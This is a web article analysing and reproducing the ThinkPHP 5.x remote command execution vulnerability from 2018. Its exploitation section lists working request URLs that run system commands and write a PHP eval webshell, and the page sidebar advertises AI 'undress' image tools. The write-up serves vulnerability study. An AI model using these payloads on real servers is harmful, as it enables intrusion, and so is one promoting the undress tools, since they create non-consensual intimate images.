PHP Framework
ThinkPHP
ThinkPHP 5.x remote command execution vulnerability analysis and reproduction
ThinkPHP 5.x remote command execution vulnerability analysis and reproduction
0x00 Foreword
ThinkPHP officially released an important security update on December 9, 2018, which fixed a serious remote code execution vulnerability. This update mainly involves a security update. Since the framework does not perform enough detection on the controller name, it will lead to a possible getshell vulnerability when forced routing is not turned on. The affected versions include versions 5.0 and 5.1. It is recommended to update to the latest version as soon as possible. .
0x01 Scope of Impact
5.x
0x02 Vulnerability Analysis
Thinkphp v5.0.x patch address: https://github.com/top-think/framework/com...
Thinkphp v5.1 .x patch address: https://github.com/top-think/framework/com...
The controller part of the routing information has been filtered. It can be seen that the problem occurs in the routing
Key code during scheduling:
Before the repair, the program did not filter the controller, allowing the attacker to call any class method by introducing the \ symbol .
The $this->app->controller method is used to instantiate the controller, and then calls the methods in the instance. Follow up with the controller method:
The parseModuleAndClass method parses out $module and $class, and then instantiates $class.
In the parseModuleAndClass method, when $name starts with a backslash \, it is used directly as the class name. Taking advantage of the characteristics of the namespace, if you can control the $name here (that is, the controller part of the route), you can instantiate any class.
Next, let’s look back at the routing parsing code. The route/dispatch/Url.php::parseUrl method calls route/Rule.php::parseUrlPath to parse the routing information in pathinfo
The code is relatively simple, just use / Splits $url without any filtering.
The routing url is obtained from Request::path ()
Since the default configuration of var_pathinfo is s, we can use $_GET ['s '] to pass routing information, you can also use pathinfo to pass, but during testing, the \ in $_SERVER ['pathinfo'] will be replaced with / in the windows environment. Combined with the previous analysis, the preliminary utilization code can be obtained as follows: index.php?s=index/\namespace\class/method, which will instantiate the \namespace\class class and execute the method method.
0x03 Vulnerability Exploitation
docker vulnerability environment source code:https://github.com/vulnspy/thinkphp-5.1.29
Local environment: thinkphp5.0.15 php5.6n apache2.0
http://www.thinkphp.cn/donate/download/id/...
1. Use the system function to execute remote commands
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2. Use the phpinfo function to write out the information of phpinfo ()
http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3. Write shell:
http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
or
http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>
The above is the detailed content of ThinkPHP 5.x remote command execution vulnerability analysis and reproduction. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1389
52
How to run thinkphp project
Apr 09, 2024 pm 05:33 PM
To run the ThinkPHP project, you need to: install Composer; use Composer to create the project; enter the project directory and execute php bin/console serve; visit http://localhost:8000 to view the welcome page.
There are several versions of thinkphp
Apr 09, 2024 pm 06:09 PM
ThinkPHP has multiple versions designed for different PHP versions. Major versions include 3.2, 5.0, 5.1, and 6.0, while minor versions are used to fix bugs and provide new features. The latest stable version is ThinkPHP 6.0.16. When choosing a version, consider the PHP version, feature requirements, and community support. It is recommended to use the latest stable version for best performance and support.
How to run thinkphp
Apr 09, 2024 pm 05:39 PM
Steps to run ThinkPHP Framework locally: Download and unzip ThinkPHP Framework to a local directory. Create a virtual host (optional) pointing to the ThinkPHP root directory. Configure database connection parameters. Start the web server. Initialize the ThinkPHP application. Access the ThinkPHP application URL and run it.
Which one is better, laravel or thinkphp?
Apr 09, 2024 pm 03:18 PM
Performance comparison of Laravel and ThinkPHP frameworks: ThinkPHP generally performs better than Laravel, focusing on optimization and caching. Laravel performs well, but for complex applications, ThinkPHP may be a better fit.
Development suggestions: How to use the ThinkPHP framework to implement asynchronous tasks
Nov 22, 2023 pm 12:01 PM
"Development Suggestions: How to Use the ThinkPHP Framework to Implement Asynchronous Tasks" With the rapid development of Internet technology, Web applications have increasingly higher requirements for handling a large number of concurrent requests and complex business logic. In order to improve system performance and user experience, developers often consider using asynchronous tasks to perform some time-consuming operations, such as sending emails, processing file uploads, generating reports, etc. In the field of PHP, the ThinkPHP framework, as a popular development framework, provides some convenient ways to implement asynchronous tasks.
How to install thinkphp
Apr 09, 2024 pm 05:42 PM
ThinkPHP installation steps: Prepare PHP, Composer, and MySQL environments. Create projects using Composer. Install the ThinkPHP framework and dependencies. Configure database connection. Generate application code. Launch the application and visit http://localhost:8000.
How is the performance of thinkphp?
Apr 09, 2024 pm 05:24 PM
ThinkPHP is a high-performance PHP framework with advantages such as caching mechanism, code optimization, parallel processing and database optimization. Official performance tests show that it can handle more than 10,000 requests per second and is widely used in large-scale websites and enterprise systems such as JD.com and Ctrip in actual applications.
Development suggestions: How to use the ThinkPHP framework for API development
Nov 22, 2023 pm 05:18 PM
Development suggestions: How to use the ThinkPHP framework for API development. With the continuous development of the Internet, the importance of API (Application Programming Interface) has become increasingly prominent. API is a bridge for communication between different applications. It can realize data sharing, function calling and other operations, and provides developers with a relatively simple and fast development method. As an excellent PHP development framework, the ThinkPHP framework is efficient, scalable and easy to use.
